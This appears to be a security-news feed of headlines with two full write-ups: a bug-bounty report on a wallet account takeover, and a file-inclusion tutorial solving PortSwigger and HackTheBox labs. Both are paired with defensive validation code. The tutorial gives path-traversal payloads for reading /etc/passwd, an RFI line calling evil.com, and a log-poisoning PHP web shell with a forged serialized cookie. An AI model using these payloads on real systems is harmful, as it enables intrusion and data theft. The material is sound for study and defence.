I Clicked a Random Button in Google Slides — Then Google Paid Me $2,240The strange trick that exposed a hidden security flaw (and how you can find bugs like this too).Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-04-21 04:16:12
Lab: Exploiting an API endpoint using documentationWe will solve this lab based on the API documentation exposed to delete Carlos's user.Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-04-21 04:15:02
HTTP Parameter Pollution: The Dirty Little Secret That Gave Me Full Backend Access. Free Link. Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-04-21 04:00:20
Why CISOs are watching the GenAI supply chain shift closelyIn supply chain operations, GenAI is gaining traction. But according to Logility’s Supply Chain Horizons 2025 report, many security leaders remain uneasy about what that means for data protection, legacy tech, and trust in automation. The survey of 500 global supply chain leaders shows that 97% are already using some form of GenAI. But only a third are using tools designed specifically for supply chain tasks. And nearly half (43%) say they worry about how … More → The post Why CISOs are watching the GenAI supply chain shift closely appeared first on Help Net Security.
by Help Net Security
2025-04-21 00:34:00
Did DOGE “breach” Americans’ data? (Lock and Code S06E08)This week on the Lock and Code podcast, we speak with Sydney Saubestre about DOGE and its access to Americans' data.
by Malwarebytes Labs
2025-04-20 21:48:25
Palantir exec defends company’s immigration surveillance workOne of the founders of startup accelerator Y Combinator offered unsparing criticism this weekend of the controversial data analytics company Palantir, leading a company executive to offer an extensive defense of Palantir’s work. The back-and-forth came after federal filings showed that U.S. Immigration and Customs Enforcement (ICE) — tasked with carrying out the Trump administration’s […]
by TechCrunch
2025-04-20 16:23:58
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 42Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malicious NPM Packages Targeting PayPal Users New Malware Variant Identified: ResolverRAT Enters the Maze       Nice chatting with you: what connects cheap Android smartphones, WhatsApp and cryptocurrency theft?   BPFDoor’s Hidden Controller Used Against Asia, Middle East […]
by Security Affairs
2025-04-20 13:31:13
Phishers abuse Google OAuth to spoof Google in DKIM replay attackIn a rather clever attack, hackers leveraged a weakness that allowed them to send a fake email that seemed delivered from Google's systems, passing all verifications but pointing to a fraudulent page that collected logins. [...]
by BleepingComputer
2025-04-20 11:00:17
How to disable ACR on your TV (and stop companies from spying on you)Smarter TV operating systems come with new privacy risks - chief among them is automatic content recognition (ACR), a feature that tracks what you watch.
by ZDNET Security
2025-04-20 10:28:00
APT29 Deploys GRAPELOADER Malware Targeting European Diplomats Through Wine-Tasting LuresThe Russian state-sponsored threat actor known as APT29 has been linked to an advanced phishing campaign that's targeting diplomatic entities across Europe with a new variant of WINELOADER and a previously unreported malware loader codenamed GRAPELOADER. "While the improved WINELOADER variant is still a modular backdoor used in later stages, GRAPELOADER is a newly observed initial-stage tool
by The Hacker News
2025-04-20 10:14:24
State-sponsored hackers embrace ClickFix social engineering tacticClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks. [...]
by BleepingComputer
2025-04-20 09:53:17
Security Affairs newsletter Round 520 by Pierluigi Paganini – INTERNATIONAL EDITIONA new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Attackers exploited SonicWall SMA appliances since January 2025 ASUS routers with AiCloud vulnerable to auth bypass exploit U.S. […]
by Security Affairs
2025-04-20 08:00:17
Week in review: LLM package hallucinations harm supply chains, Nagios Log Server flaws fixedHere’s an overview of some of last week’s most interesting news, articles, interviews and videos: Apple plugs zero-day holes used in targeted iPhone attacks (CVE-2025-31200, CVE-2025-31201) Apple has released emergency security updates for iOS/iPadOS, macOS, tvOS and visionOS that fix two zero-day vulnerabilities (CVE-2025-31200, CVE-2025-31201) that have been exploited “in an extremely sophisticated attack against specific targeted individuals on iOS.” When companies merge, so do their cyber threats For CISOs, mergers and acquisitions (M&A) bring … More → The post Week in review: LLM package hallucinations harm supply chains, Nagios Log Server flaws fixed appeared first on Help Net Security.
by Help Net Security
2025-04-20 07:49:26
Chaining Bugs Like a Hacker: IDOR to Account Takeover in 10 Minutes🚀Free Article Link…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-04-20 07:48:08
THM — NappingEnumerationContinue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-04-20 07:47:02
Business Logic Flaw worth $1250

Ciao hackers, I hope you’re hacking well. In this write-up, I’m going to share a business logic flaw on a crypto wallet website that can lead to the takeover of any victim’s wallet account. I will be using redacted.com as the main domain.

The company is a crypto wallet to earn, buy, store, and stake tokens. The front end of the application is at app.redacted.tv and all the backend APIs are at api.redacted.tv. As usual, I fired up my Burp Suite and started exploring the application.

I created an account on the website; to verify the email, a verification code is sent to the given email address. I verified the account and on the next page, 2FA is compulsory to set up. After finishing the registration my account was ready to use. Below is the flow of registration:
1. Enter name, email address and password
2. Enter the verification code on the verify email page
3. Set up 2FA
4. Logged in to the account

In the email verification step, I noticed that the URL is https://app.redacted.tv/verify?email=user@gmail.com. I thought, let’s open this URL in an incognito tab or another browser. After force-browsing the URL, the verification page opened without entering a password and asked for the verification code.

I quickly checked whether the same verification code could be used again or not, and I was surprised by the next page. It confirmed that if I have the verification code of the victim then I can set up 2FA on the victim’s account as well as log in to the account without a password. After repeating the below flow:
1. Open https://app.redacted.tv/verify?email=user@gmail.com
2. Enter the received verification code
3. Set up 2FA
4. Logged in to the account

It worked as I thought and confirmed that:
- An already-used verification code can be used multiple times for the same email.
- You don’t need a password to set up 2FA and to get logged in to any other user’s account. You just need the verification code and email of the victim’s account.
- You can set up 2FA even if it was already configured during the registration process. The old 2FA will be overridden by the new one.

The only piece missing in the attack puzzle is the verification code. The verification code is random and it’s not possible to brute force. Moreover, the verification code is tied to a unique email address. I tried a few ways to get a verification code:
- Is there any client-side function or piece of code to generate it by providing an email address? No.
- Is the verification code leaked in a response or through other APIs? No.
- Looking for verification codes on the Internet Archive, waybackurls, etc. Found none.

Without any expectation and with good intentions I submitted the report to the security team with the proper impact, given that the attacker already has the verification code. After a few days, I got a positive response from the program manager and received a reward of 20000 tokens worth $1250.

Sometimes, you just have to submit the report without expecting any reward. You’ve already invested the time to find the issue, so it’s better to report it; otherwise, that effort goes to waste. Don’t let the assumption that the attack complexity is high or that the program might not accept it stop you from reporting.

Thanks for reading, hope you learned something new. Do clap and share if you like. Sayonara and Happy Hacking!
Twitter: 7he_unlucky_guy
Linkedin: Vijeta

Business Logic Flaw worth $1250 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
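The three findings in the write-up above (a reusable verification code, 2FA enrolment keyed by email alone, and silent override of an existing 2FA secret) map onto three missing server-side checks. The following is an added example, not the author's code and not the target's, that models the flawed flow next to a hardened one in an in-memory service so the replay can be reproduced offline. Class names, the six-digit code format, the TTL values and the use of SHA-256 for the password hash are assumptions made for the demo.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Optional

CODE_TTL = 600      # assumed: verification codes live ten minutes
SESSION_TTL = 900   # assumed: post-verification session lifetime


@dataclass
class Account:
    email: str
    password_hash: str
    verified: bool = False
    totp_secret: Optional[str] = None


def _hash(password):
    # SHA-256 keeps the demo dependency-free; use argon2/bcrypt/scrypt in production.
    return hashlib.sha256(password.encode()).hexdigest()


def _new_code():
    return f"{secrets.randbelow(10**6):06d}"


class VulnerableFlow:
    """Mirrors the write-up: the code is never invalidated and 2FA setup is keyed by email."""

    def __init__(self):
        self.accounts, self.codes = {}, {}

    def register(self, email, password):
        self.accounts[email] = Account(email, _hash(password))
        self.codes[email] = _new_code()
        return self.codes[email]          # "sent" to the mailbox

    def verify(self, email, code):
        return hmac.compare_digest(self.codes.get(email, ""), code)   # reusable forever

    def setup_2fa(self, email, code, totp_secret):
        # No password, no session: anyone holding an old code can (re)enrol 2FA.
        if not self.verify(email, code):
            return False
        self.accounts[email].totp_secret = totp_secret
        return True


class HardenedFlow:
    def __init__(self):
        self.accounts, self.codes, self.sessions = {}, {}, {}

    def register(self, email, password):
        self.accounts[email] = Account(email, _hash(password))
        code = _new_code()
        self.codes[email] = {"code": code, "expires": time.time() + CODE_TTL, "used": False}
        return code

    def verify(self, email, code):
        """Single-use and time-limited; success yields a session bound to this email."""
        entry = self.codes.get(email)
        if entry is None or entry["used"] or time.time() > entry["expires"]:
            return None
        if not hmac.compare_digest(entry["code"], code):
            return None
        entry["used"] = True                      # a replayed code now fails
        self.accounts[email].verified = True
        token = secrets.token_urlsafe(32)
        self.sessions[token] = {"email": email, "expires": time.time() + SESSION_TTL}
        return token

    def setup_2fa(self, session_token, totp_secret):
        """First-time enrolment only, and only inside a verified session.

        Replacing an existing secret must go through a re-authenticated path
        (password plus current TOTP), never through this endpoint.
        """
        session = self.sessions.get(session_token)
        if session is None or time.time() > session["expires"]:
            return False
        account = self.accounts[session["email"]]
        if not account.verified or account.totp_secret is not None:
            return False
        account.totp_secret = totp_secret
        return True


if __name__ == "__main__":
    v = VulnerableFlow()
    code = v.register("victim@example.com", "pw")
    v.setup_2fa("victim@example.com", code, "VICTIM")
    print("vulnerable replay overrides 2FA:", v.setup_2fa("victim@example.com", code, "ATTACKER"))
    h = HardenedFlow()
    code = h.register("victim@example.com", "pw")
    tok = h.verify("victim@example.com", code)
    print("hardened replay accepted:", h.verify("victim@example.com", code) is not None)
    print("hardened first enrolment:", h.setup_2fa(tok, "VICTIM"), "second:", h.setup_2fa(tok, "X"))
```

The hardened flow still accepts the code only once and ties what can be done afterwards to a session minted at verification time, so knowing a victim's email (the value exposed in the verify URL) buys an attacker nothing without a fresh, unused code.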
2025-04-20 07:46:30
Mastering Clean Code in Node.js with Hexagonal Architecture (Ports & Adapters)In today’s fast-paced dev world, writing clean, maintainable, and testable code isn’t just a good practice — it’s survival. Enter…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-04-19 21:33:41
Chinese APT IronHusky Deploys Updated MysterySnail RAT on RussiaKaspersky researchers report the reappearance of MysterySnail RAT, a malware linked to Chinese IronHusky APT, targeting Mongolia and…
by Hackread
2025-04-19 20:41:00
Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux SystemsCybersecurity researchers have uncovered three malicious packages in the npm registry that masquerade as a popular Telegram bot library but harbor SSH backdoors and data exfiltration capabilities. The packages in question are listed below - node-telegram-utils (132 downloads) node-telegram-bots-api (82 downloads) node-telegram-util (73 downloads) According to supply chain
by The Hacker News
2025-04-19 18:13:05
Cozy Bear’s Wine Lure Drops WineLoader Malware on EU DiplomatsMidnight Blizzard (APT29/Cozy Bear) targets European embassies and Ministries of Foreign Affairs with sophisticated phishing emails disguised as…
by Hackread
2025-04-19 18:04:34
Widespread Microsoft Entra lockouts tied to new security feature rolloutWindows administrators from numerous organizations report widespread account lockouts triggered by false positives in the rollout of a new Microsoft Entra ID "leaked credentials" detection app called MACE. [...]
by BleepingComputer
2025-04-19 17:37:08
Attackers exploited SonicWall SMA appliances since January 2025Threat actors are actively exploiting a remote code execution flaw in SonicWall Secure Mobile Access (SMA) appliances since January 2025. Arctic Wolf researchers warn that threat actors actively exploit a vulnerability, tracked as CVE-2021-20035 (CVSS score of 7.1), in SonicWall Secure Mobile Access (SMA) since at least January 2025. The vulnerability is an OS Command […]
by Security Affairs
2025-04-19 14:22:00
ASUS Confirms Critical Flaw in AiCloud Routers; Users Urged to Update FirmwareASUS has disclosed a critical security flaw impacting routers with AiCloud enabled that could permit remote attackers to perform unauthorized execution of functions on susceptible devices. The vulnerability, tracked as CVE-2025-2492, has a CVSS score of 9.2 out of a maximum of 10.0. "An improper authentication control vulnerability exists in certain ASUS router firmware series,"
by The Hacker News
2025-04-19 11:17:28
New Android malware steals your credit cards for NFC relay attacksA new malware-as-a-service (MaaS) platform named 'SuperCard X' has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data. [...]
by BleepingComputer
2025-04-19 10:05:15
Critical Erlang/OTP SSH RCE bug now has public exploits, patch nowPublic exploits are now available for a critical Erlang/OTP SSH vulnerability tracked as CVE-2025-32433, allowing unauthenticated attackers to remotely execute code on impacted devices. [...]
by BleepingComputer
2025-04-19 09:30:00
Florida Man Enters the Encryption WarsPlus: A US judge rules against police cell phone “tower dumps,” China names alleged NSA agents it says were involved in cyberattacks, and Customs and Border Protection reveals its social media spying tools.
by WIRED Security News
2025-04-19 08:01:46
Google Gemini AI is getting ChatGPT-like Scheduled Actions featureGoogle Gemini is testing a ChatGPT-like scheduled tasks feature called "Scheduled Actions," which will allow you to create tasks that Gemini will execute later. [...]
by BleepingComputer
2025-04-19 00:00:00
[webapps] FoxCMS 1.2.5 - Remote Code Execution (RCE)FoxCMS 1.2.5 - Remote Code Execution (RCE)
by Exploit DB
2025-04-19 00:00:00
[webapps] Drupal 11.x-dev - Full Path DisclosureDrupal 11.x-dev - Full Path Disclosure
by Exploit DB
2025-04-18 20:45:00
Chinese Smishing Kit Powers Widespread Toll Fraud Campaign Targeting U.S. Users in 8 StatesCybersecurity researchers are warning of a "widespread and ongoing" SMS phishing campaign that's been targeting toll road users in the United States for financial theft since mid-October 2024. "The toll road smishing attacks are being carried out by multiple financially motivated threat actors using the smishing kit developed by 'Wang Duo Yu,'" Cisco Talos researchers Azim Khodjibaev, Chetan
by The Hacker News
2025-04-18 20:33:27
Powering Down Vulnerability: Securing the Energy Sector's Supply ChainThe energy sector stands as a critical pillar of our society. From the electricity powering our homes to the fuel driving our industries, reliable energy is essential. However, the very interconnectedness that makes the energy sector so vital also exposes it to significant vulnerabilities, particularly within its supply chain.
by KnowBe4
2025-04-18 20:32:52
China Cybercriminals Behind Toll-Themed Smishing Attacks Surge in the US and UKResecurity warns that a China-based cybercriminal gang dubbed the “Smishing Triad” is launching a wave of road toll-themed SMS phishing (smishing) attacks against users across the US and the UK.
by KnowBe4
2025-04-18 20:04:40
Could Ransomware Survive Without Cryptocurrency?Threat actors would be at least temporarily derailed, experts say. But the real issue ladders back to organizations’ weak cyber hygiene.
by Dark Reading
2025-04-18 19:42:04
CVE-2025-32433: Erlang/OTP SSH Remote Code Execution Vulnerability ExplainedOn April 16th, 2025, the Erlang/OTP team disclosed a critical vulnerability affecting their SSH server implementation [1]. CVE-2025-32433 is an unauthenticated remote code execution vulnerability with a CVSS score of 10.0 (Critical) that allows adversaries to run arbitrary code on vulnerable systems with elevated privileges. Erlang/OTP is commonly used in critical infrastructure; therefore, organizations are strongly urged to patch vulnerable SSH servers without delay.
by Picus Security
2025-04-18 19:27:00
Cybersecurity 2025 trends: GenAI and supply chains top of the threat listIt is hard to believe that we are now over three months into 2025. This is a good time to pause and survey stakeholders and cybersecurity experts about the emerging trends observed so far this year.
by Barracuda
2025-04-18 19:26:02
ASUS routers with AiCloud vulnerable to auth bypass exploitASUS warns of an authentication bypass vulnerability in routers with AiCloud enabled that could allow unauthorized execution of functions on the device. ASUS warns of an authentication bypass vulnerability, tracked as CVE-2025-2492 (CVSS v4 score: 9.2), which impacts routers with AiCloud enabled. A remote attacker can trigger the flaw to perform unauthorized execution of functions on the […]
by Security Affairs
2025-04-18 19:17:50
AWWA Supports Introduction of Collaborative Cybersecurity Legislation
by Dark Reading
2025-04-18 19:14:51
Organizations Fix Less Than Half of All Exploitable Vulnerabilities, With Just 21% of GenAI App Flaws Resolved
by Dark Reading
2025-04-18 18:34:18
Burp Suite + Claude AI: Connect Using MCP Server (2025 Setup)
by HACKLIDO
2025-04-18 18:27:53
2025’s Top OSINT Tools: A Fresh Take on Open-Source IntelCheck out the top OSINT tools of 2025, an updated list featuring the best free and paid open-source…
by Hackread
2025-04-18 18:04:39
Attackers and Defenders Lean on AI in Identity Fraud BattleIdentity verification, insurance claims, and financial services are all seeing surges in AI-enabled fraud, but organizations are taking advantage of AI systems to fight fire with fire.
by Dark Reading
2025-04-18 18:01:50
Understanding and Exploiting File Inclusion Vulnerability

Introduction to File Inclusion Vulnerabilities

File inclusion vulnerabilities let an attacker make the application load files it was never meant to expose, including dangerous content from external sources. The two flavours of this web application attack are Local File Inclusion (LFI) and Remote File Inclusion (RFI). Both stem from the same root cause, user input flowing unchecked into a file-loading operation, but they play out differently in an attack. Like many weaknesses in the cybersecurity domain, these go by several names: the exploitation technique is usually called path traversal, and the security community often uses that term interchangeably with LFI.

Local File Inclusion (LFI): In LFI, the attacker manipulates a file-path parameter so that sensitive files on the server's own filesystem are pulled into the application's context. Imagine a librarian who mindlessly follows a note that says "go up four shelves and fetch the locked ledger." Using path traversal, i.e. sequences like ../../../../etc/passwd, the attacker walks the directory structure to reach /etc/passwd, configuration files or even the source code of your application. Path traversal is how that key, weak input validation, is used to step outside the intended areas and past the boundaries placed on file access. The damage? Leaked secrets are only the beginning. With log poisoning, where the attacker writes malicious code into server logs and then includes the log file, or abuse of PHP wrappers such as php://filter, an LFI can fairly easily be escalated to full code execution. A classic example? The 2007 Joomla LFI exploit, where attackers combined path traversal with weak validation to leak database logs - two years before Brian Krebs.

Remote File Inclusion (RFI): RFI takes it a step further. Rather than rummaging through the local shelves, it is like the librarian fetching a book from off-site, from somewhere that does not belong, say a dodgy website hosting a nasty PHP script in the back room. By supplying a fully qualified URL (e.g. http://evil.com/malware.php), the attacker tricks the application into downloading and executing a remote script over protocols such as HTTP or FTP. The result is typically instant: remote code execution, with the server handed to the attacker on a silver platter. RFI peaked in the early 2000s with exploits against poorly configured PHP websites where allow_url_fopen and allow_url_include were left enabled (the door was wide open).

Now that we know how this vulnerability works, you may be keen to try it in the wild. Say a website takes a parameter, https://example.com?filename=cat.png; you can change the file name to fetch other files from the server. Note that on Linux the web root is usually /var/www/html, three directories below the root directory. To reach a sensitive file such as flag.txt, or /etc/passwd (the usual proof of concept for this vulnerability), we need a path relative to the root directory, which is three levels above the web root in our server configuration. So we traverse directories using the simple back-step ../; since we need to move three levels up, ../../../file would work. Feel free to solve this PortSwigger lab and try it yourself. Simply put, enumerate to find the parameter and use a simple payload like the following to get /etc/passwd:

https://0a2000cc04b90fd6802b9ee300ba00e5.web-security-academy.net/image?filename=../../../etc/passwd

But when accessed through the website it renders an empty image, something like the one below.

Let's look in Burp Suite instead, and there we do find the contents of /etc/passwd in the response. We solved the lab, but only because we knew the right parameter to fuzz or inject our payloads into. On real websites, how do we find parameters to inject into? That is a valid and intriguing question.

How to find parameters to test for file inclusion vulnerability?

Simply put, this blog covers four options. These are not a menu from which you pick the one you find attractive and leave the rest. In the real world we may need to test every option, and in the worst case one or none will work. But across CTFs and vulnerable machines, we have found that these four methods have stood the test of time and worked in most scenarios.

Option 1: Manual hunting

As cliché as it sounds: click every button, submit every form, explore every option, take careful notes of the network connections each endpoint makes, and inspect every function with Burp Suite; when we spot an abnormal or interesting request or endpoint (this comes with the intuition that experience brings), we may find some endpoints. That does not sound fair, does it? Must we wait 3-7 years for mastery? No: recon frameworks, asset discovery and attack surface management tools have proven to do this better. Check out tools such as rengine, osmedeus and reconftw on GitHub. Alternatively, you can read about these automated recon frameworks and how effective they are in this blog.

Option 2: Using ZAP Proxy

This is a highly under-rated tool. It has features called spider and AJAX spider, a powerful spidering GUI accessible with a single right-click on the target! See the image below: click Manual Explore > pick your domain.com > right-click it > select AJAX Spider or Spider, and you have a GUI application that discovers endpoints in the web application for you in real time.

Another under-rated feature is the active scan. It scans for basic attacks and, fortunately for us, a single scan solved our lab. In the bottom-left corner we see the alerts pane listing all findings, including an alert for path traversal. So if you are not yet using ZAP, make sure you use it on your next pentest or CTF engagement to pick the low-hanging fruit and discover hidden endpoints.

Option 3: Arjun

Another popular parameter discovery toolkit, available on GitHub. It installs easily with pipx (search for how to install pip and Python on your operating system), after which you can run the tool. Unfortunately it found no parameters in our case; that is fair, sometimes things work as expected and sometimes they don't.

Option 4: Param Miner extension for Burp Suite

Install it from the Burp Suite extensions section and make sure the extension is enabled. It did not find the endpoint either, but a peek at Logger in Burp Suite revealed an interesting query. This proves the importance of the most overlooked section of Burp Suite, and it taught us a valuable lesson: do not overlook Logger.

Option 5: Your favourite param-discovery toolkits

You might be considering tools such as GAU (get all urls) or waybackurls. These are valid, but in CTFs, and sometimes in the real world, they have not given me results as helpful as the first option (automated frameworks). So test all the options before you draw your own conclusion; for me, the first four options have held up and proven useful from time to time.

Black box testing

With this approach you find the valid parameter and fuzz it with wordlists from the internet (spray and pray), but in the long run it is the least effective method. When you encounter Windows-based servers, use payloads like the following, with backslashes instead of forward slashes:

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

Now that we understand how to find parameters, all the sauce is in using and modifying payloads. For that reason we will quickly run through the labs.

Lab 1: File path traversal, traversal sequences blocked with absolute path bypass
Lab URL: https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass

The server here does not validate whether the requested path is relative or absolute. By supplying an absolute path such as /etc/passwd, the server reads the file straight from the root directory, bypassing any intended restriction to a specific folder (e.g. /var/www/images). This works because the server naively trusts the user-supplied path without normalising it, or maybe because the server itself is hosted in the /root directory? We can only make educated guesses, since we have neither the source code nor any idea how the server is configured, but nonetheless an absolute path is one of the valid bypasses to try in file inclusion attacks!

Payload: image?filename=/etc/passwd
URL to solve this lab: https://0abd00f003c4b8d780a68f89005800a7.web-security-academy.net/image?filename=/etc/passwd

Lab 2: File path traversal, traversal sequences stripped non-recursively
Lab URL: https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively

Sometimes ../ is stripped by the server. You can try ....// or ..../\ to bypass the restriction and retrieve files from the server.

Payload: ....//....//....//etc/passwd
URL to solve this lab: https://0a4f0056045333198529bcfd00140019.web-security-academy.net/image?filename=....//....//....//etc/passwd

Lab 3: File path traversal, traversal sequences stripped with superfluous URL-decode
Lab URL: https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode

Sometimes characters like / are not accepted by the web server, and a simple URL encoding, done in Burp Suite or with CyberChef, bypasses this restriction. Feel free to combine the techniques learnt in labs 1 and 2 and URL-encode those payloads.

Payload: ..%252f..%252f..%252fetc/passwd
URL to solve this lab: https://0a52002e03482067812362170031003e.web-security-academy.net/image?filename=

Lab 4: File path traversal, validation of start of path
Lab URL: https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path

Sometimes including the base path in the payload (e.g. /var/www/images/../../../../etc/passwd) satisfies the server's check on the start of the path, after which the traversal escapes the restricted directory and reaches sensitive files. Just as we store a website's HTML in /var/www/html, we can store images in /var/www/images. When we manually explore the image location by right-clicking and viewing the image, we get this URL: https://0a5700af03e6c4bd8173ed7e009900cb.web-security-academy.net/image?filename=/var/www/images/21.jpg, which suggests we should prepend a valid start path for the payload to work.

Payload: /var/www/images/../../../etc/passwd
URL to solve this lab: https://0a5700af03e6c4bd8173ed7e009900cb.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwd

Lab 5: File path traversal, validation of file extension with null byte bypass
Lab URL: https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass

The server may be configured to check for and accept only a valid file extension (e.g. .png). Adding a null byte (%00) after the target file (e.g. ../../../etc/passwd%00.png) truncates the string, discarding the enforced extension. This allows traversal while superficially satisfying the extension check.

Payload: ../../../etc/passwd%00.png

Whitebox Testing
Lab URL: https://app.hackthebox.com/challenges/Toxic

Pentesting LFI White Box Series: How a Tiny Cookie Crashed the Party (Understanding the Toxic Challenge's Vulnerability)

Source Code analysis

The Toxic challenge has two critical flaws:

Blind trust in cookies: the website uses a cookie (PHPSESSID) to decide what to show you, but it never checks whether the cookie is safe; it just follows orders.
Dangerous file inclusion: when the website opens files, it does not verify that you are allowed to see them. Like leaving your house keys under the doormat.

Where is the vulnerability hiding? In index.php (the main page code) and PageModel.php (a helper script). Let's translate the code into plain English.

The autoloader (index.php):

spl_autoload_register(function ($name) {
    if (preg_match('/Models/', $name)) {
        $name = "models/${name}";
    }
    include_once "${name}.php";
});

When the website needs a tool (a class), it looks in the toolbox folder (models/) to grab it. The problem is that it does not lock the toolbox: attackers can trick it into doing something it was never intended to do.

The cookie setup:

if (empty($_COOKIE['PHPSESSID'])) {
    $page = new PageModel;
    $page->file = '/www/index.html';
    setcookie('PHPSESSID', base64_encode(serialize($page)), ...);
}

The website hands you a lunchbox (the cookie) with a sandwich inside (index.html). The problem is that you can replace the cookie with anything, including a malicious payload.

The PageModel class (PageModel.php):

class PageModel {
    public $file;
    public function __destruct() {
        include($this->file);
    }
}

This code automatically opens whatever file is stored in $file. The problem is that if $file is set to something dangerous (such as /var/log/secret.log), the website will still open it, which is what lets attackers exploit a local file inclusion vulnerability. Our goal is to turn a boring cookie into a remote command centre.

Step 1: Create a poisoned cookie

Tamper with the cookie. The cookie is a base64-encoded serialised PageModel object, so let's decode it:

┌─[mccleod1290@parrot]─[~/Desktop]
└──╼ $echo "Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9" | base64 -d
O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}

Change the file property from /www/index.html to /var/log/nginx/access.log (the website's diary):

┌─[dwbruijn@parrot]─[~/Desktop]
└──╼ $echo 'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}' | base64
Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=

Step 2: Write a secret message in the diary

Poison the logs: send a request to the website with a malicious User-Agent header:

<?php system($_GET['cmd']); ?>

This writes your PHP code into the log file (like scribbling instructions in the diary).

Step 3: Combine steps 1 and 2

Trigger the exploit: reload the page. The website reads the poisoned log file and executes your code. Your HTTP request should look something like the following:

Now, to get the flag, you could do the following: add ?cmd=ls+/ to the URL to list files, then use ?cmd=cat+/flag.txt to grab the flag!

Conclusion

File inclusion vulnerabilities, whether Local (LFI) or Remote (RFI), are a stark reminder of the danger of misplaced trust. LFI attacks the application's own habitat, using path traversal to reach important files or gain elevated privileges. RFI instead turns the application into a puppet, running malicious code pulled from external domains. Both share one thing: blind faith in poorly sanitised user input. The fallout is severe.

A single unvalidated parameter can lead to data leaks, credential theft and complete system takeover. Attackers move from reading /etc/passwd to users' home directories, to planting webshells, poisoning logs, or total takeover of the underlying infrastructure. Mitigation isn't optional, it's existential:

Strictly enforce allowlists: only allow access to specific files, directories or URLs. If it's not on the list, it does not exist.
Disable dynamic inclusion: if your app does not need to include files based on user input, turn the feature off. Period.
Normalise and sanitise: resolve paths to absolute form, remove traversal sequences (../), and ban dangerous characters (e.g. %00, ://).
Sandbox file operations: run inclusion operations as a limited user to keep them away from vital system resources.
Defend in layers: combine input validation with a Web Application Firewall (WAF) and runtime monitoring for anomalies.

Understanding LFI and RFI is not transactional, it's transformative; it's not patching code, it's renewing trust. Each inclusion point is an entry point for attackers. Hardening these vectors is not just fixing a bug, you are taking out an entire class of exploits. Complacency is the enemy in cybersecurity: stay curious, stay hungry, and see you in the next blog.
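The mitigation list above, applied to the image endpoint from the labs, as an added example that is not part of the original post: a Python check that decodes to a fixed point, refuses null bytes, absolute paths and .. segments, canonicalises with realpath and enforces an extension allowlist, so every lab payload walked through earlier is rejected with a loggable reason. The base directory /var/www/images and the allowlist are assumptions; the symlink demo builds a throwaway directory to show why textual checks alone are not enough.

```python
"""Traversal-resistant filename check for an endpoint such as /image?filename=...

Added example (not from the original post). Assumes images live under a base
directory like /var/www/images (constructed) and only image extensions are served.
"""
import os
import tempfile
from urllib.parse import unquote

ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the value stops changing, so a double-encoded
    ..%252f (lab 3) is seen as ../ instead of slipping past a one-shot decoder."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_filename(base_dir: str, user_value: str) -> tuple:
    """Return (canonical_path, verdict). canonical_path is None when rejected.

    The verdict strings are meant to be logged: a burst of 'rejected: ...'
    entries against one parameter is a cheap detection signal for traversal probing.
    """
    value = fully_decode(user_value)
    if "\x00" in value:
        # Lab 5: a null byte would truncate the path in C-backed file APIs.
        return None, "rejected: null byte"
    value = value.replace("\\", "/")  # Windows-style ..\..\ payloads
    if value.startswith("/"):
        # Labs 1 and 4: the client never chooses the root, not even the 'right' one.
        return None, "rejected: absolute path"
    if ".." in value.split("/"):
        # Lab 3 (after decoding) and plain ../ payloads. Note that '....' is not a
        # traversal segment; we strip nothing, which is what made lab 2's server bypassable.
        return None, "rejected: traversal sequence"
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, value))
    # Authoritative check: after symlink resolution the file must still sit under base.
    if os.path.commonpath([base, candidate]) != base or candidate == base:
        return None, "rejected: escapes base directory"
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        return None, "rejected: extension not allowlisted"
    return candidate, "ok"


def symlink_escape_demo() -> str:
    """Show why realpath() matters: a symlink inside the image directory pointing
    outside it passes the textual checks but fails canonical containment.
    Builds a throwaway directory (constructed) and returns the verdict."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "images")
    os.mkdir(base)
    os.symlink(os.path.join(root, "outside"), os.path.join(base, "link"))
    _, verdict = check_filename(base, "link/photo.png")
    return verdict


if __name__ == "__main__":
    # Constructed sample inputs: the payloads walked through in the labs above.
    for payload in ["21.jpg", "../../../etc/passwd", "/etc/passwd",
                    "....//....//....//etc/passwd", "..%252f..%252f..%252fetc/passwd",
                    "/var/www/images/../../../etc/passwd", "../../../etc/passwd%00.png",
                    "..\\..\\..\\windows\\win.ini"]:
        _, verdict = check_filename("/var/www/images", payload)
        print(f"{payload!r:45} -> {verdict}")
    print("symlink demo ->", symlink_escape_demo())
```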
